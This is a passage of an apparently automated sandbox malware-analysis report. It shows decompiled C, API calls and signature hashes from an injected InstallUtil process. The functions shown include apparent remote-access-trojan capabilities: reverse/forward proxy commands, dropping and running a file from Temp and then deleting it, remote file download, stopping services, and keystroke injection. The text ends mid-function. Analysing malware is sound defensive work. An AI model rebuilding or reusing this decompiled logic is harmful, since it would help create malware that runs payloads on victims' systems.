0x0040f25b
0x0040f262
0x00000000
0x00000000
0x0040f264
0x0040f26b
0x00000000
0x00000000
0x0040f26d
0x0040f26f
0x00000000
0x00000000
0x0040f277
0x0040f289
0x0040f28e
0x0040f1b8
0x0040f1ba
0x00000000
0x0040f1ba
0x0040f0f5
0x0040f0f8
0x0040f1a4
0x0040f1aa
0x0040f1ad
0x0040f1ad
0x0040f1b1
0x0040f1b6
0x00000000
0x0040f1b6
0x0040f0fe
0x0040f101
0x0040f12e
0x0040f133
0x0040f139
0x0040f15f
0x0040f16f
0x0040f171
0x0040f177
0x0040f17d
0x0040f181
0x0040f186
0x00000000
0x0040f186
0x0040f103
0x0040f106
0x0040f123
0x0040f129
0x00000000
0x0040f129
0x0040f10b
0x0040f111
0x0040f117
0x0040f117
0x00000000

APIs

SetEvent.KERNEL32(?,?), ref: 0040F09E
inet_ntoa.WS2_32(?), ref: 0040F139

Strings

GetDirectListeningPort, xrefs: 0040F23C
StartReverse, xrefs: 0040F209
StopForward, xrefs: 0040F21A
StartForward, xrefs: 0040F1FD
StopReverse, xrefs: 0040F22B

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
API String ID: 3578746661-168337528
Opcode ID: ca4cbf4a710a1dffe4970b9c771ea6e8593c9dde921f1a806264f8c51899bd72
Instruction ID: 76d52ed6f850256a9c7d93c3e4990458ec236edd804395ae2c42ed6eff791a8c
Opcode Fuzzy Hash: ca4cbf4a710a1dffe4970b9c771ea6e8593c9dde921f1a806264f8c51899bd72
Instruction Fuzzy Hash: B8519331F042009BC624BB35D95AA6E36A5AB85308F40453FF401ABAE1EF7D8D09C78F

Uniqueness

Uniqueness Score: -1.00%

Function 00414A98 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108
filesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00414A98(void* __edx, void* __eflags, char _a4, char _a28) {
				char _v28;
				struct _SHELLEXECUTEINFOA _v88;
				char _v112;
				char _v136;
				char _v316;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t33;
				void* _t41;
				intOrPtr _t50;
				signed int _t60;
				char* _t68;
				void* _t73;
				void* _t90;
				void* _t91;

				_t94 = __eflags;
				_t33 = E00402053(_t60,  &_v136, __edx, _t90, "\\");
				_t87 = E004052D4(_t60,  &_v112, E00438A1A(_t60, __eflags, "Temp"), _t90, _t94, _t33);
				E00402ED0(_t60,  &_v28, _t35, _t90, _t94,  &_a4);
				E00401F98();
				_t68 =  &_v136;
				E00401F98();
				_push(_t68);
				_push(_t68);
				_t41 = E00414CD5(E0040D72E( &_v316, _t35, _t94, E00401F6B( &_v28), 0x10),  &_v316);
				_t95 = _t41;
				if(_t41 == 0) {
					E00402053(_t60, _t91 - 0x18, _t87, _t90, 0x461084);
					_push(0x6f);
					_t73 = 0x46e8e8;
					goto L6;
				} else {
					_t87 =  &_a28;
					E00414CE5( &_v316,  &_a28, _t95);
					E0040D6DF( &_v316,  &_a28, _t95);
					_v88.hwnd = _v88.hwnd & 0x00000000;
					_v88.lpVerb = _v88.lpVerb & 0x00000000;
					_v88.cbSize = 0x3c;
					_v88.fMask = 0x40;
					_t50 = E00401F6B( &_v28);
					asm("movaps xmm0, [0x467b30]");
					_v88.lpFile = _t50;
					asm("movups [ebp-0x40], xmm0");
					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
					_t97 = _v88.hProcess;
					if(_v88.hProcess != 0) {
						E00402053(_t60, _t91,  &_a28, _t90, 0x461084);
						_push(0x70);
						E00404A78(0x46e8e8, _t87, _t97);
						WaitForSingleObject(_v88.hProcess, 0xffffffff);
						CloseHandle(_v88.hProcess);
						DeleteFileA(E00401F6B( &_v28));
					}
					_t98 = _t60 - 1;
					if(_t60 == 1) {
						E00402053(_t60, _t91 - 0x18, _t87, _t90, 0x461084);
						_push(0x6e);
						_t73 = 0x46e8e8;
						L6:
						E00404A78(_t73, _t87, _t98);
					}
				}
				E0040CD94(_t60,  &_v316, 0x461084);
				E00401F98();
				E00401F98();
				return E00401F98();
			}

0x00414a98
0x00414ab3
0x00414acf
0x00414ad4
0x00414add
0x00414ae2
0x00414ae8
0x00414aed
0x00414aee
0x00414b0b
0x00414b10
0x00414b12
0x00414bd3
0x00414bd8
0x00414bda
0x00000000
0x00414b18
0x00414b18
0x00414b21
0x00414b2c
0x00414b31
0x00414b38
0x00414b3c
0x00414b43
0x00414b4a
0x00414b4f
0x00414b56
0x00414b5d
0x00414b73
0x00414b76
0x00414b7a
0x00414b82
0x00414b87
0x00414b8b
0x00414b95
0x00414b9e
0x00414bad
0x00414bad
0x00414bb3
0x00414bb6
0x00414bbe
0x00414bc3
0x00414bc5
0x00414bdf
0x00414bdf
0x00414bdf
0x00414bb6
0x00414bea
0x00414bf2
0x00414bfa
0x00414c0d

APIs

Part of subcall function 00414CE5: __EH_prolog.LIBCMT ref: 00414CEA

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00461084), ref: 00414B95
CloseHandle.KERNEL32(00000000), ref: 00414B9E
DeleteFileA.KERNEL32(00000000), ref: 00414BAD
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00414B61

Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D

Strings

<, xrefs: 00414B3C
@, xrefs: 00414B43
Temp, xrefs: 00414AB9

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: <$@$Temp
API String ID: 1704390241-1032778388
Opcode ID: cb7a10c681e402de1a51f3ed916c28cc6a8f75b74a7a391232d8617e3acadb7e
Instruction ID: fbeb40d35a52a9f2c07a2ad59e65b24144671cb58ffc0d3941be7302ec8cf352
Opcode Fuzzy Hash: cb7a10c681e402de1a51f3ed916c28cc6a8f75b74a7a391232d8617e3acadb7e
Instruction Fuzzy Hash: 56417E319042099ACB14FBA1DC56AFE7734AF50358F40416EF506760E1EF781A8ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 00406335 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00406335(intOrPtr __ecx, void* __eflags, intOrPtr _a8, char _a12, char _a16, void* _a36, char _a40, void _a52, char _a64, intOrPtr _a100052, intOrPtr _a100072, char _a100080) {
				long _v0;
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __ebp;
				WCHAR* _t35;
				long _t42;
				struct _OVERLAPPED* _t54;
				intOrPtr _t72;
				intOrPtr _t74;
				long _t76;
				void* _t77;
				void* _t78;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t85;

				_t82 = __eflags;
				E00453420();
				_push(_t77);
				_t74 = __ecx;
				_t69 =  &_a100080;
				asm("xorps xmm0, xmm0");
				_a8 = __ecx;
				_t54 = 0;
				asm("movlpd [esp+0x10], xmm0");
				_a12 = 0;
				E00403222(0,  &_a16, _t77, _t82, E004078F9( &_a40,  &_a100080, _t77, L".part"));
				E00401EC9();
				_t78 = CreateFileW(E00401EC4( &_a12), 4, 0, 0, 2, 0x80, 0);
				_t83 = _v0 - _a100072;
				if(_t83 > 0) {
					L6:
					CloseHandle(_t78);
					_t35 = E00401EC4( &_a100080);
					MoveFileW(E00401EC4( &_a16), _t35);
					_t54 = 1;
				} else {
					_t72 = _a100072;
					if(_t83 >= 0) {
						L5:
						if(_v0 < _t72) {
							goto L2;
						} else {
							goto L6;
						}
					} else {
						while(1) {
							L2:
							_t42 = E00404B6D(_t74,  &_a64, 0x186a0);
							_t76 = _t42;
							asm("cdq");
							_v12 = _v12 + _t42;
							asm("adc [esp+0x18], edx");
							WriteFile(_t78,  &_a52, _t76,  &_v0, _t54);
							_t80 = _t80 - 0x18;
							E00402077(_t54, _t80, _t69, _t78, _t83,  &_v12, 8);
							E00404A78(_v12, _t69, _t83, 0x57, _v12);
							if(_t76 <= 0) {
								break;
							}
							_t74 = _v16;
							_t85 = _v20 - _a100052;
							if(_t85 < 0) {
								continue;
							} else {
								if(_t85 > 0) {
									goto L6;
								} else {
									goto L5;
								}
							}
							goto L7;
						}
						CloseHandle(_t78);
						DeleteFileW(E00401EC4( &_v8));
					}
				}
				L7:
				E00401EC9();
				E00401EC9();
				return _t54;
			}

0x00406335
0x0040633a
0x00406340
0x00406342
0x00406344
0x0040634c
0x0040634f
0x00406353
0x00406355
0x00406364
0x00406373
0x0040637c
0x0040639d
0x004063a6
0x004063aa
0x0040641e
0x0040641f
0x0040642c
0x0040643c
0x00406442
0x004063ac
0x004063ac
0x004063b3
0x00406418
0x0040641c
0x00000000
0x00000000
0x00000000
0x00000000
0x004063b5
0x004063b5
0x004063b5
0x004063c2
0x004063c7
0x004063c9
0x004063ca
0x004063d3
0x004063df
0x004063e5
0x004063f1
0x004063fc
0x00406403
0x00000000
0x00000000
0x0040640c
0x00406410
0x00406414
0x00000000
0x00406416
0x00406416
0x00000000
0x00000000
0x00000000
0x00000000
0x00406416
0x00000000
0x00406414
0x00406467
0x00406477
0x00406477
0x004063b3
0x00406444
0x00406448
0x00406454
0x00406465

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,0046E260,00460F88,?,00000000,0040678D,00000000), ref: 00406397
WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040678D,00000000,?,?,0000000A,00000000), ref: 004063DF

Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D

CloseHandle.KERNEL32(00000000,?,00000000,0040678D,00000000,?,?,0000000A,00000000), ref: 0040641F
MoveFileW.KERNEL32(00000000,00000000), ref: 0040643C
CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406467
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406477

Part of subcall function 00404B6D: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0046E278,00404C20,00000000,00000000,00000000,?,0046E278,R@), ref: 00404B7C
Part of subcall function 00404B6D: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405462), ref: 00404B9A

Strings

.part, xrefs: 0040635B

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID: .part
API String ID: 1303771098-3499674018
Opcode ID: 798f1f7071e4ee0b4ce41177e1129b2153cd15b0a3cf4394d810e954a4b78364
Instruction ID: 6fb8a973e12795c2698763c1ab66a8abeeba72767a8ffa267f2143bb89f398c1
Opcode Fuzzy Hash: 798f1f7071e4ee0b4ce41177e1129b2153cd15b0a3cf4394d810e954a4b78364
Instruction Fuzzy Hash: F0319171504351AFC210EB21DC5599FB3E8EF84349F00493EF946A61E2DB78AA488B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00417428 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417428(char _a4) {
				struct _SERVICE_STATUS _v32;
				void* _t6;
				signed int _t16;
				void* _t19;
				void* _t20;

				_t16 = 0;
				_t6 = OpenSCManagerW(0, 0, 0x40);
				_t1 =  &_a4; // 0x416e21
				_t20 = _t6;
				_t19 = OpenServiceW(_t20, E00401EC4(_t1), 0x40);
				if(_t19 != 0) {
					_t16 = 0 | ControlService(_t19, 2,  &_v32) != 0x00000000;
					CloseServiceHandle(_t20);
					CloseServiceHandle(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				E00401EC9();
				return _t16;
			}

0x00417433
0x00417437
0x0041743f
0x00417442
0x00417451
0x00417455
0x00417476
0x00417479
0x0041747c
0x00417457
0x00417458
0x00417458
0x00417481
0x0041748e

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00416E21,00000000), ref: 00417437
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00416E21,00000000), ref: 0041744B
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416E21,00000000), ref: 00417458
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00416E21,00000000), ref: 00417467
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416E21,00000000), ref: 00417479
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416E21,00000000), ref: 0041747C

Strings

!nA, xrefs: 0041743F, 0041747E

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID: !nA
API String ID: 221034970-1013695210
Opcode ID: dd1b822d362b7800f214d3c755142f6096ecd04e465fbb94400992cd749a0077
Instruction ID: 15a54400799d2b468692d2dab35677395eb76679f6786d8cdad390a39cdf9a1b
Opcode Fuzzy Hash: dd1b822d362b7800f214d3c755142f6096ecd04e465fbb94400992cd749a0077
Instruction Fuzzy Hash: FBF0C8715042187BD2106B65DC49EBF3B7CDB8576AB100026FE09961D2DA38CD8685F9

Uniqueness

Uniqueness Score: -1.00%

Function 00445AD5 Relevance: 12.2, APIs: 8, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E00445AD5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E004427A6(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E004318FB(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00432753(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E00444BF3(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00432753(_t101);
									goto L36;
								}
								_t62 = E00444BF3(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00432753(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E004421F7(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00452F00();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E00444BF3(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E004421F7(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00452F00();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x00445ada
0x00445adb
0x00445adc
0x00445ae3
0x00445ae7
0x00445ae8
0x00445aee
0x00445af4
0x00445afa
0x00445afd
0x00445afd
0x00445b00
0x00445b02
0x00445b02
0x00445b00
0x00445b04
0x00445b09
0x00445b10
0x00445b13
0x00445b13
0x00445b2f
0x00445b35
0x00445b3a
0x00445ccd
0x00445ce0
0x00445b40
0x00445b40
0x00445b43
0x00445b48
0x00445b4c
0x00445ba0
0x00445ba0
0x00445ba2
0x00445ba4
0x00445cc2
0x00445cc2
0x00445cc4
0x00445cc5
0x00000000
0x00445ccb
0x00445bb5
0x00445bbb
0x00445bbd
0x00000000
0x00000000
0x00445bc3
0x00445bd5
0x00445bda
0x00445bde
0x00000000
0x00000000
0x00445beb
0x00445c25
0x00445c28
0x00445c2b
0x00445c2d
0x00445c2f
0x00445c31
0x00445c7d
0x00445c7d
0x00445c7f
0x00445c7f
0x00445c81
0x00445cbb
0x00445cbc
0x00000000
0x00445cc1
0x00445c95
0x00445c9a
0x00445c9c
0x00000000
0x00000000
0x00445ca0
0x00445ca1
0x00445ca2
0x00445ca5
0x00445ce1
0x00445ce4
0x00445ca7
0x00445ca7
0x00445ca8
0x00445ca8
0x00445cb5
0x00445cb7
0x00445cb9
0x00445cea
0x00000000
0x00000000
0x00000000
0x00000000
0x00445cb9
0x00445c33
0x00445c36
0x00445c38
0x00445c3a
0x00445c3c
0x00445c3f
0x00445c44
0x00445c5f
0x00445c61
0x00445c6b
0x00445c6d
0x00445c6e
0x00445c70
0x00000000
0x00000000
0x00445c72
0x00445c78
0x00445c78
0x00000000
0x00445c78
0x00445c46
0x00445c48
0x00445c4c
0x00445c51
0x00445c53
0x00445c55
0x00000000
0x00000000
0x00445c57
0x00000000
0x00445c57
0x00445bed
0x00445bf2
0x00000000
0x00000000
0x00445bf8
0x00445bfa
0x00000000
0x00000000
0x00445c11
0x00445c16
0x00445c1a
0x00000000
0x00000000
0x00000000
0x00445c20
0x00445b53
0x00445b55
0x00445b57
0x00445b5f
0x00445b7e
0x00445b80
0x00445b8a
0x00445b8c
0x00445b8d
0x00445b8f
0x00000000
0x00000000
0x00445b95
0x00445b9b
0x00445b9b
0x00000000
0x00445b9b
0x00445b63
0x00445b67
0x00445b6c
0x00445b70
0x00000000
0x00000000
0x00445b76
0x00000000
0x00445b76

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043CEA6,0043CEA6,?,?,?,00445D26,00000001,00000001,7EE85006), ref: 00445B2F
__alloca_probe_16.LIBCMT ref: 00445B67
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00445D26,00000001,00000001,7EE85006,?,?,?), ref: 00445BB5
__alloca_probe_16.LIBCMT ref: 00445C4C
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,7EE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00445CAF
__freea.LIBCMT ref: 00445CBC

Part of subcall function 004421F7: RtlAllocateHeap.NTDLL(00000000,00431BAF,?,?,00435157,?,?,?,?,?,0040B882,00431BAF,?,?,?,?), ref: 00442229

__freea.LIBCMT ref: 00445CC5
__freea.LIBCMT ref: 00445CEA

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 6c04ecc1949e56f0ffd47d20a20d3f6d347b1252d0043ebdfb42c54fcc1dfd9c
Instruction ID: 594a8b8c100fc5b4e580d96ac5553466fb607dcaecf2dc625855ed07f8f4da3e
Opcode Fuzzy Hash: 6c04ecc1949e56f0ffd47d20a20d3f6d347b1252d0043ebdfb42c54fcc1dfd9c
Instruction Fuzzy Hash: AB51E172600716ABFF258F65CC81EAF77A9EB44754F15462AFC05DB242EB38DC40C6A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041618D Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004161C6
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004161E7
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00416207
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 0041621B
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00416231
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 0041624E
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00416269
SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00416285

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: 12786c4cafe0b8a23b25c8da6f4de9c7c0ef2038655d50f1abea837446537b14
Instruction ID: a02611773dfd50ea6d7010240faf607bce085a1ae0f4f5925b3690c131d481f1
Opcode Fuzzy Hash: 12786c4cafe0b8a23b25c8da6f4de9c7c0ef2038655d50f1abea837446537b14
Instruction Fuzzy Hash: 44319E31548308AAE311CF51D841BEBBBDCEF98B54F00080FF6808A191D2A6D5C88BA7

Uniqueness

Uniqueness Score: -1.00%

Function 004435B1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E004435B1(void* __ebx, signed int __ecx, void* __edi, void* __esi, char _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v22;
				char _v24;
				signed int _v28;
				signed int* _v32;
				signed int _v33;
				signed int** _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				void* _v64;
				signed int _t86;
				intOrPtr _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr _t105;
				signed int _t110;
				void* _t111;
				signed int _t116;
				signed int _t117;
				signed int _t129;
				void* _t133;
				signed int _t135;
				intOrPtr _t143;
				signed short* _t144;
				intOrPtr _t145;
				signed int** _t146;
				signed int _t147;
				signed int* _t148;
				signed int _t149;
				signed int _t152;
				signed short** _t154;
				signed int _t155;
				signed int _t159;
				signed int _t163;
				intOrPtr* _t171;
				signed short _t172;
				signed short* _t173;
				signed int** _t174;
				void* _t175;
				void* _t177;
				signed short* _t179;
				intOrPtr* _t180;
				intOrPtr* _t181;
				signed int* _t183;
				signed int _t184;
				signed int** _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;

				_t149 = __ecx;
				_t86 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t86 ^ _t187;
				_t171 = _a12;
				_v52 = _a4;
				_t143 = _a24;
				_v40 = _a16;
				_v48 = _t171;
				_v44 = _t143;
				_t183 = _a20;
				_v32 = _t183;
				_t91 = _a8;
				if(_t91 == 0) {
					_t179 =  *(_t143 + 0x154);
				} else {
					if(_t91 == 1) {
						_t179 =  *(_t143 + 0x158);
					} else {
						_t179 =  *(_t143 + 0x15c);
					}
				}
				if( *((intOrPtr*)(_t143 + 0xac)) == 1) {
					goto L113;
				} else {
					_t163 = _t149 & 0xffffff00 | _a8 == 0x00000002;
					_v24 = 0x76c +  *((intOrPtr*)(_t171 + 0x14));
					_v33 = _t163;
					_v22 =  *((intOrPtr*)(_t171 + 0x10)) + 1;
					_v18 =  *((intOrPtr*)(_t171 + 0xc));
					_v16 =  *((intOrPtr*)(_t171 + 8));
					_v14 =  *((intOrPtr*)(_t171 + 4));
					_v12 =  *_t171;
					_v10 = 0;
					_t194 = _t163;
					if(_t163 == 0) {
						__eflags = 0;
						_t129 = E004448AB(0, _t183, 0,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0, 0);
					} else {
						_t129 = E004449ED(0, _t183, _t194,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0);
					}
					_t147 = _t129;
					if(_t147 == 0) {
						goto L113;
					} else {
						_t175 = _t147 + _t147;
						_t165 = _t175 + 8;
						asm("sbb eax, eax");
						if((_t175 + 0x00000008 & _t129) == 0) {
							_t184 = 0;
							__eflags = 0;
							L18:
							_v28 = _t184;
							if(_t184 == 0) {
								L30:
								E00432753(0);
								_t183 = _v32;
								while(1) {
									L113:
									_t172 =  *_t179 & 0x0000ffff;
									__eflags = _t172;
									if(_t172 == 0) {
										break;
									}
									__eflags =  *_t183;
									if( *_t183 == 0) {
										L28:
										L29:
										return E004318FB(_v8 ^ _t187);
									}
									_v32 = 0;
									_t152 = 0;
									__eflags = 0;
									_v28 = _t179;
									_t144 = _t179;
									_t94 = _t172 & 0x0000ffff;
									do {
										_t144 =  &(_t144[1]);
										_t152 = _t152 + 1;
										__eflags =  *_t144 - _t94;
									} while ( *_t144 == _t94);
									_t95 = _t172 & 0x0000ffff;
									_v28 = _t144;
									_t145 = _v44;
									__eflags = _t95 - 0x64;
									if(__eflags > 0) {
										_t96 = _t95 - 0x68;
										__eflags = _t96;
										if(_t96 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L110:
												_push(0x49);
												L111:
												_pop(_t97);
												_t84 =  &_v52; // 0x443b28
												_t98 = E0044297B(_t145, _t153, _t179,  *_t84, _t97, _v48, _v40, _t183, _t145, _v32);
												_t188 = _t188 + 0x1c;
												__eflags = _t98;
												if(_t98 == 0) {
													 *((intOrPtr*)(E00439941())) = 0x16;
													goto L29;
												}
												L112:
												_t179 = _v28;
												continue;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L110;
											}
											L108:
											_t154 = _v40;
											_t179 =  &(_t179[1]);
											 *( *_t154) = _t172;
											 *_t154 =  &(( *_t154)[1]);
											 *_t183 =  *_t183 - 1;
											continue;
										}
										_t102 = _t96 - 5;
										__eflags = _t102;
										if(_t102 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L105:
												_push(0x4d);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L105;
											}
											goto L108;
										}
										_t103 = _t102 - 6;
										__eflags = _t103;
										if(_t103 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L100:
